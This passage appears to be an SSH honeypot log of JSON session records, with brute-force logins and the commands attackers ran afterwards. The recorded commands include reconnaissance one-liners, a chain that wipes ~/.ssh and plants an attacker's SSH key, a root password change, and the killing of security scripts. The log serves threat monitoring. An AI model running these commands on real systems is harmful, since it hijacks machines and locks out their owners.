"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 111111
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "066a704a621e",
"src_ip": "195.178.110.228",
"start_time": "2026-06-30T01:01:02.281281Z",
"end_time": "2026-06-30T01:01:05.593966Z",
"duration": "3.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "111111"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "ce6278bca6f4",
"src_ip": "195.178.110.228",
"start_time": "2026-06-30T00:56:32.545687Z",
"end_time": "2026-06-30T00:56:33.107187Z",
"duration": "0.6",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 1
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "d5e925fc017e",
"src_ip": "180.76.233.159",
"start_time": "2026-06-30T00:53:57.595278Z",
"end_time": "2026-06-30T00:53:58.842167Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "1"
},
"commands": [
"uname -a"
],
"detailed_commands": [
{
"cmd": "uname -a",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: pi
{
"id": "2e3bb32bbae1",
"src_ip": "180.76.233.159",
"start_time": "2026-06-30T00:53:55.591190Z",
"end_time": "2026-06-30T00:53:57.430690Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "pi",
"pass": "nanopi"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "278429d817eb",
"src_ip": "124.220.61.209",
"start_time": "2026-06-30T00:17:15.142229Z",
"end_time": "2026-06-30T00:17:29.639856Z",
"duration": "14.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "b34db23607d7",
"src_ip": "124.220.61.209",
"start_time": "2026-06-30T00:17:01.144159Z",
"end_time": "2026-06-30T00:19:01.150718Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 123qwe123
Remote entity achieved interactive shell state. Command sequence (19 executed):
{
"id": "d56122f7ee0d",
"src_ip": "124.220.61.209",
"start_time": "2026-06-30T00:16:57.989043Z",
"end_time": "2026-06-30T00:17:38.429680Z",
"duration": "40.4",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123qwe123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"cat /proc/cpuinfo | grep name | wc -l",
"echo \"root:eACxzDO2Am9G\"|chpasswd|bash",
"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;",
"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
"ls -lh $(which ls)",
"which ls",
"crontab -l",
"w",
"uname -m",
"cat /proc/cpuinfo | grep model | grep name | wc -l",
"top",
"uname",
"uname -a",
"whoami",
"lscpu | grep Model",
"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
},
{
"cmd": "cat /proc/cpuinfo | grep name | wc -l",
"failed": false,
"error": null
},
{
"cmd": "echo \"root:eACxzDO2Am9G\"|chpasswd|bash",
"failed": false,
"error": null
},
{
"cmd": "rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;",
"failed": false,
"error": null
},
{
"cmd": "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
"failed": false,
"error": null
},
{
"cmd": "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
"failed": false,
"error": null
},
{
"cmd": "ls -lh $(which ls)",
"failed": false,
"error": null
},
{
"cmd": "which ls",
"failed": false,
"error": null
},
{
"cmd": "crontab -l",
"failed": false,
"error": null
},
{
"cmd": "w",
"failed": false,
"error": null
},
{
"cmd": "uname -m",
"failed": false,
"error": null
},
{
"cmd": "cat /proc/cpuinfo | grep model | grep name | wc -l",
"failed": false,
"error": null
},
{
"cmd": "top",
"failed": false,
"error": null
},
{
"cmd": "uname",
"failed": false,
"error": null
},
{
"cmd": "uname -a",
"failed": false,
"error": null
},
{
"cmd": "whoami",
"failed": false,
"error": null
},
{
"cmd": "lscpu | grep Model",
"failed": false,
"error": null
},
{
"cmd": "df -h | head -n 2 | awk 'FNR == 2 {print $2;}'",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 340,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: ubuntu / deploy123
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "c68695525cf9",
"src_ip": "185.242.3.195",
"start_time": "2026-06-30T00:15:56.476079Z",
"end_time": "2026-06-30T00:15:57.636647Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "ubuntu",
"pass": "deploy123"
},
"commands": [
"echo OK"
],
"detailed_commands": [
{
"cmd": "echo OK",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "2a219a84faea",
"src_ip": "111.230.30.28",
"start_time": "2026-06-30T00:10:16.632437Z",
"end_time": "2026-06-30T00:12:16.708287Z",
"duration": "120.1",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "ca1d62d480cd",
"src_ip": "138.99.80.102",
"start_time": "2026-06-30T00:07:21.662101Z",
"end_time": "2026-06-30T00:07:22.525087Z",
"duration": "0.9",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "d37073fcc1de",
"src_ip": "138.99.80.102",
"start_time": "2026-06-30T00:07:19.669599Z",
"end_time": "2026-06-30T00:07:21.528557Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / He123456789
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "83e6ebe20894",
"src_ip": "138.99.80.102",
"start_time": "2026-06-30T00:07:17.860158Z",
"end_time": "2026-06-30T00:07:22.521291Z",
"duration": "4.7",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "He123456789"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "fc0673cc4fbe",
"src_ip": "209.141.41.212",
"start_time": "2026-06-30T00:04:45.555224Z",
"end_time": "2026-06-30T00:04:45.793102Z",
"duration": "0.2",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "c19d60345fef",
"src_ip": "209.141.41.212",
"start_time": "2026-06-30T00:04:44.304797Z",
"end_time": "2026-06-30T00:04:45.530956Z",
"duration": "1.2",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / qQ@123456
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "663a23040ac4",
"src_ip": "209.141.41.212",
"start_time": "2026-06-30T00:04:43.787579Z",
"end_time": "2026-06-30T00:04:45.789268Z",
"duration": "2.0",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "qQ@123456"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "af1b4a2013c0",
"src_ip": "183.238.41.121",
"start_time": "2026-06-30T00:00:38.918401Z",
"end_time": "2026-06-30T00:00:38.918401Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "3f8f8002ae35",
"src_ip": "183.238.41.121",
"start_time": "2026-06-29T23:58:37.731895Z",
"end_time": "2026-06-29T23:58:38.012347Z",
"duration": "0.3",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "a9c44706c1c9",
"src_ip": "180.76.233.159",
"start_time": "2026-06-29T23:55:47.336794Z",
"end_time": "2026-06-29T23:55:47.340074Z",
"duration": "0.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: qwest
{
"id": "6793abf18767",
"src_ip": "45.164.251.106",
"start_time": "2026-06-29T23:54:40.276834Z",
"end_time": "2026-06-29T23:54:42.266776Z",
"duration": "2.0",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "qwest",
"pass": "Qwest!2024!"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: ubuntu / Qwest!2024!
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "0aad2936bc02",
"src_ip": "45.164.251.106",
"start_time": "2026-06-29T23:54:38.010648Z",
"end_time": "2026-06-29T23:54:40.085615Z",
"duration": "2.1",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "ubuntu",
"pass": "Qwest!2024!"
},
"commands": [
"uname -a"
],
"detailed_commands": [
{
"cmd": "uname -a",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN",
"RECONNAISSANCE"
]
}Credential acceptance event recorded. Target authentication: root / Qwest!2024!
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "6b82ac57f589",
"src_ip": "45.164.251.106",
"start_time": "2026-06-29T23:54:36.371500Z",
"end_time": "2026-06-29T23:54:37.820455Z",
"duration": "1.4",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Qwest!2024!"
},
"commands": [
"uname -a"
],
"detailed_commands": [
{
"cmd": "uname -a",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN",
"RECONNAISSANCE"
]
}Credential acceptance event recorded. Target authentication: user / admin
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "8c2b870de53e",
"src_ip": "45.148.10.239",
"start_time": "2026-06-29T23:41:14.429970Z",
"end_time": "2026-06-29T23:41:15.509518Z",
"duration": "1.1",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "user",
"pass": "admin"
},
"commands": [
"echo OK"
],
"detailed_commands": [
{
"cmd": "echo OK",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / admin
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "655c681f02ad",
